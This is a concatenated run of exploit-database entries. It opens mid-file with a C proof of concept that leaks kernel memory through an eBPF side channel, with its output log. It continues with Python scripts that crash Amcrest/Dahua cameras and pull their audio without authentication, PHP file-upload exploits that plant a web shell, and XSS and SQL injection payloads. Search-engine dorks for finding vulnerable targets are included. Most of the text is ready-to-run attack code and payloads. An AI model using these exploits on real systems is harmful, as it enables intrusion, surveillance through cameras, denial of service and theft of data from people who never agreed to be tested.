.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_LD_ABS(SIZE, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
int bpf_(int cmd, union bpf_attr *attrs) {
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int array_create(int value_size, int num_entries) {
union bpf_attr create_map_attrs = {
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = 4,
.value_size = value_size,
.max_entries = num_entries
};
int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
if (mapfd == -1)
err(1, "map create");
return mapfd;
}
unsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) {
uint64_t time;
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&idx,
.value = (uint64_t)&time,
.flags = off,
};
int res = bpf_(0x13370001, &attr);
if (res)
err(1, "map flush loc");
return time;
}
void array_set_dw(int mapfd, uint32_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&key,
.value = (uint64_t)&value,
.flags = BPF_ANY,
};
int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
if (res)
err(1, "map update elem");
}
int prog_load(struct bpf_insn *insns, size_t insns_count) {
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
//printf("==========================\n%s==========================\n",
verifier_log);
errno = errno_;
if (progfd == -1)
err(1, "prog load");
return progfd;
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
int progfd = prog_load(insns, insns_count);
// hook eBPF program up to a socket
// sendmsg() to the socket will trigger the filter
// returning 0 in the filter should toss the packet
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
err(1, "socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
err(1, "setsockopt");
return socks[1];
}
void trigger_proc(int sockfd) {
if (write(sockfd, "X", 1) != 1)
err(1, "write to proc socket failed");
}
int input_map, leak_map;
int sockfds[16];
int leak_bit(unsigned long addr, int bit) {
array_set_dw(input_map, 0, addr);
int count_0 = 0, count_1 = 0;
while (count_0 + count_1 < 100) {
array_time_flush_loc(leak_map, 0, 2048+0x1000);
trigger_proc(sockfds[bit+8]);
unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000);
array_time_flush_loc(leak_map, 0, 2048);
trigger_proc(sockfds[bit+0]);
unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048);
//printf("%u %u\n", t0, t1);
if (t0 < 50)
count_0++;
if (t1 < 50)
count_1++;
}
printf("%d vs %d\n", count_0, count_1);
return (count_0 > count_1) ? 0 : 1;
}
int leak_byte(unsigned long addr) {
int byte = 0;
for (int bit=0; bit<8; bit++) {
byte |= leak_bit(addr, bit)<<bit;
}
return byte;
}
int main(int argc, char **argv) {
setbuf(stdout, NULL);
input_map = array_create(8, 1);
leak_map = array_create(0x3000, 1);
if (argc != 3)
errx(1, "invocation (expects addr and length)");
#define BPF_REG_CONFUSED_SLOT BPF_REG_6
#define BPF_REG_SLOW_SLOT BPF_REG_7
#define BPF_REG_CONFUSED_SLOT_ALIAS BPF_REG_8
#define BPF_REG_LEAK_ARRAY BPF_REG_9
#define BPF_REG_CONFUSED BPF_REG_1
#define BPF_REG_SECRET_VALUE BPF_REG_2
#define BPF_REG_DUMMY_SLOT BPF_REG_3
for (int i=0; i<16; i++) {
bool dummy_ff = (i >= 8);
int selected_bit = i & 7;
struct bpf_insn insns[] = {
/* setup: write 0x00 or 0xff to -216 to get a big stack
allocation and to prepare dummy */
BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff),
/* setup: compute stack slot pointers to :
* - type-confused stack slot (at -72)
* - pointer to type-confused stack slot (at -144)
*/
BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72),
BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144),
//BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP),
//BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216),
/* write to dummy slot (to make a big stack and to permit later read) */
//BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0),
/* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */
BPF_LD_MAP_FD(BPF_REG_ARG1, input_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0),
/* setup: spill pointer to type-confused stack slot */
BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0),
/* setup: load pointer to leak area into register */
BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */
BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0),
/* CHEATED: fence and flush */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT),
BPF_EMIT_CALL(4/*clflush_mfence*/),
BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216),
/* START CRITICAL PATH */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0),
BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0),
BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<<selected_bit),
/* 0 or 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_SECRET_VALUE, 12-selected_bit),
/* 0 or 0x1000 */
BPF_ALU64_REG(BPF_ADD, BPF_REG_LEAK_ARRAY, BPF_REG_SECRET_VALUE),
BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_LEAK_ARRAY, 0),
/* END CRITICAL PATH */
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
sockfds[i] = create_filtered_socket_fd(insns, ARRSIZE(insns));
puts("BPF PROG LOADED SUCCESSFULLY");
}
/*
puts("testing flushed...\n");
for (int i=-1; i<10; i++) {
unsigned int res = array_time_flush_loc(leak_map, 0, 2048);
if (i >= 0)
printf(" %u\n", res);
}
*/
unsigned long base_addr = strtoull(argv[1], NULL, 16);
for (int i=0; i<atoi(argv[2]); i++) {
unsigned long addr = base_addr + i;
unsigned char leaked = leak_byte(addr);
printf("%016lx: 0x%02hhx ('%c')\n", addr, leaked, leaked);
}
return 0;
}
*/
----------------------- END -----------------------
PoC usage:
$ sudo grep core_pattern /proc/kallsyms
ffffffff9b2954e0 D core_pattern
$ gcc -o bpf_store_skipper_assisted bpf_store_skipper_assisted.c
$ time ./bpf_store_skipper_assisted ffffffff9b2954e0 5
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
4 vs 96
1 vs 99
100 vs 0
100 vs 0
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e0: 0x63 ('c')
2 vs 98
1 vs 99
1 vs 99
1 vs 99
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e1: 0x6f ('o')
100 vs 0
3 vs 97
100 vs 0
100 vs 0
1 vs 99
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e2: 0x72 ('r')
2 vs 98
100 vs 0
0 vs 100
100 vs 0
100 vs 0
0 vs 100
0 vs 100
100 vs 0
ffffffff9b2954e3: 0x65 ('e')
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
ffffffff9b2954e4: 0x00 ('')
real 0m31.591s
user 0m2.547s
sys 0m27.429s
*/
# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Date: 2020-04-07
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Version: Many different versions due to number of Dahua/Amcrest/etc
# devices affected
# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
# 4.000.00AC000.0
# CVE : CVE-2020-5735
# Advisory: https://www.tenable.com/security/research/tra-2020-20
# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
import argparse
import hashlib
import socket
import struct
import sys
import md5
import re
## DDNS test functionality. Stack overflow via memcpy
def recv_response(sock):
# minimum size is 32 bytes
header = sock.recv(32)
# check we received enough data
if len(header) != 32:
print 'Invalid response. Too short'
return (False, '', '')
# extract the payload length field
length_field = header[4:8]
payload_length = struct.unpack_from('I', length_field)
payload_length = payload_length[0]
# uhm... lets be restrictive of accepted lengths
if payload_length < 0 or payload_length > 4096:
print 'Invalid response. Bad payload length'
return (False, header, '')
if (payload_length == 0):
return (True, header, '')
payload = sock.recv(payload_length)
if len(payload) != payload_length:
print 'Invalid response. Bad received length'
return (False, header, payload)
return (True, header, payload)
def sofia_hash(msg):
h = ""
m = hashlib.md5()
m.update(msg)
msg_md5 = m.digest()
for i in range(8):
n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
if n > 9:
if n > 35:
n += 61
else:
n += 55
else:
n += 0x30
h += chr(n)
return h
top_parser = argparse.ArgumentParser(description='lol')
top_parser.add_argument('-i', '--ip', action="store", dest="ip",
required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port",
type=int, help="The port to connect to", default="37777")
top_parser.add_argument('-u', '--username', action="store",
dest="username", help="The user to login as", default="admin")
top_parser.add_argument('--pass', action="store", dest="password",
required=True, help="The password to use")
args = top_parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"
# send the old style login request. We'll use blank hashes. This should
# trigger a challenge from new versions of the camera
old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
"\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
"\x05\x02\x00\x01\x00\x00\xa1\xaa")
sock.sendall(old_login)
(success, header, challenge) = recv_response(sock)
if success == False or not challenge:
print 'Failed to receive the challenge'
print challenge
sys.exit(0)
# extract the realm and random seed
seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
challenge)
if seeds == None:
print 'Failed to extract realm and random seed.'
print challenge
sys.exit(0)
realm = seeds.group(1)
random = seeds.group(2)
# compute the response
realm_hash = md5.new(args.username + ":" + realm + ":" +
args.password).hexdigest().upper()
random_hash = md5.new(args.username + ":" + random + ":" +
realm_hash).hexdigest().upper()
sofia_result = sofia_hash(args.password)
final_hash = md5.new(args.username + ":" + random + ":" +
sofia_result).hexdigest().upper()
challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x05\x02\x00\x08\x00\x00\xa1\xaa" +
args.username + "&&" + random_hash + final_hash)
sock.sendall(challenge_resp)
(success, header, payload) = recv_response(sock)
if success == False or not header:
print 'Failed to receive the session id'
sys.exit(0)
session_id_bin = header[16:20]
session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
print "Log in failed."
sys.exit(0)
session_id = session_id_int[0]
print "[+] Session ID: " + str(session_id)
# firmware version
command = "Protocol: " + ("a" * 0x300) + "\r\n"
command_length = struct.pack("I", len(command))
firmware = ("\x62\x00\x00\x00" + command_length +
"\x04\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
command)
sock.sendall(firmware)
(success, header, firmware_string) = recv_response(sock)
if success == False and not header:
print "[!] Probably crashed the server."
else:
print "[+] Attack failed."
##
# Exploit Title: Unauthenticated Audio Streaming from Amcrest Camera
# Shodan Dork: html:"@WebVersion@"
# Date: 08/29/2019
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Affected Version: V2.520.AC00.18.R
# Fixed Version: V2.420.AC00.18.R
# Tested on: Tested on Amcrest IP2M-841 but known to affect other Dahua devices.
# CVE : CVE-2019-3948
# Disclosure: https://www.tenable.com/security/research/tra-2019-36
# Disclosure: https://sup-files.s3.us-east-2.amazonaws.com/Firmware/IP2M-841/JS+IP2M-841/Changelog/841_721_HX1_changelog_20190729.txt
#
# To decode the scripts output using ffplay use:
# ffplay -f alaw -ar 8k -ac 1 [poc output]
# Note that this assumes the camera is using the default encoding options.
##
import argparse
import socket
import struct
import sys
##
# Read in the specified amount of data. Continuing looping until we get it all...
# what could go wrong?
#
# @return the data we read in
##
def recv_all(sock, amount):
data = ''
while len(data) != amount:
temp_data = sock.recv(amount - len(data))
data = data + temp_data
return data
top_parser = argparse.ArgumentParser(description='Download audio from the HTTP videotalk endpoint')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="80")
top_parser.add_argument('-o', '--output', action="store", dest="output", help="The file to write the audio to")
top_parser.add_argument('-b', '--bytes', action="store", dest="bytes", type=int, help="The amount of audio to download", default="1048576")
args = top_parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(True)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"
request = ('GET /videotalk HTTP/1.1\r\n' +
'Host: ' + args.ip + ':' + str(args.port) + '\r\n' +
'Range: bytes=0-\r\n' +
'\r\n')
sock.sendall(request)
status = ''
header = ''
# read in the HTTP response. Store the status.
while (header != '\r\n'):
header = header + sock.recv(1);
if (header.find('\r\n') > 0):
header = header.strip()
if (len(status) == 0):
status = header
header = ''
if (status.find('200 OK') == -1):
print '[-] Bad HTTP status. We received: "' + status + '"'
sock.close()
exit()
else:
print '[+] Downloading ' + str(args.bytes) + ' bytes of audio ...'
total_audio = ''
while (len(total_audio) < args.bytes):
# read in the header length
header_length = recv_all(sock, 4)
hlength = struct.unpack("I", header_length)[0]
if (hlength != 36):
print '[-] Unexpected header length'
sock.close()
exit()
# read in the header and extract the payload length
header = recv_all(sock, hlength)
plength = struct.unpack_from(">H", header)[0]
if (plength != 368):
print '[-] Unexpected payload length'
sock.close()
exit()
# there is a seq no in the header but since this is over
# tcp is sort of useless.
dhav = header[2:6]
if (dhav != "DHAV"):
print '[-] Invalid header'
exit(0)
# extract the audio. I'm really not sure what the first 6 bytes are
# but the last 8 serve as a type of trailer
whatami = recv_all(sock, 6)
audio = recv_all(sock, plength - hlength - 12)
trailer = recv_all(sock, 8)
if (trailer != 'dhavp\x01\x00\x00'):
print '[-] Invalid end of frame'
sock.close()
exit()
total_audio = total_audio + audio
sys.stdout.write('\r'+ str(len(total_audio)) + " / " + str(args.bytes))
sys.stdout.flush()
print ''
print '[+] Finished receiving audio.'
print '[+] Closing socket'
out_file = open(args.output, 'wb')
out_file.write(total_audio)
out_file.close()
sock.close()
# # # # #
# Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703
# Demo: http://dasinfomedia.com.au/php/amc/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
#
# if(isset($id)){
# $user_d=$this->request->data;
# $this->row_update=$this->table_user->get($id);
# $this->set('emp_update_row',$this->row_update);
#
# if($this->request->is(['post','put'])){
#
# $get_output=$this->check_update_email($this->row_update,$this->request->data('email'));
#
# if($get_output == true){
#
# if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){
# move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']);
# $this->store_image=$_FILES['image']['name'];
# }else{
# $this->store_image=$this->request->data('old_image');
# }
#
# Proof of Concept:
#
# http://localhost/[PATH]/account/profilesetting/[ID]
# http://localhost/[PATH]/img/user/[FILE]
#
# Etc..
# # # # #
source: https://www.securityfocus.com/bid/54170/info
Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
# Version : 1.01
# Link : http://code.google.com/p/uploadify-amazon-s3/
# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
# Date : 21-06-2012
# Google Dork : inurl:/files/uploadify/ -google
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/files/uploadify/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
# Exploit Title: AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
# Date: 17/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: CodeThemes
# Vendor Homepage: https://spondonit.com/
# Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179
# Version: 3.4
# Tested on: Live Demo
# Demo Link : https://amazy.rishfa.com/
# Description #
AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to Reflected
cross-site scripting because of insufficient user-supplied data
sanitization. Anyone can submit a Reflected XSS payload without login in
when searching for a new product on the search bar. This makes the
application reflect our payload in the frontend search ber, and it is fired
everything the search history is viewed.
# Proof of Concept (PoC) : Exploit #
1) Goto: https://amazy.rishfa.com/
2) Enter the following payload in 'Search Iteam box' :
"><script>alert(1)</script>
3) Now You Get a Popout as Alert 1
4) Reflected XSS payload is fired
# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB
source: https://www.securityfocus.com/bid/56110/info
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
http://www.example.com/path_gallery/plist.php?albumid=[SQLi]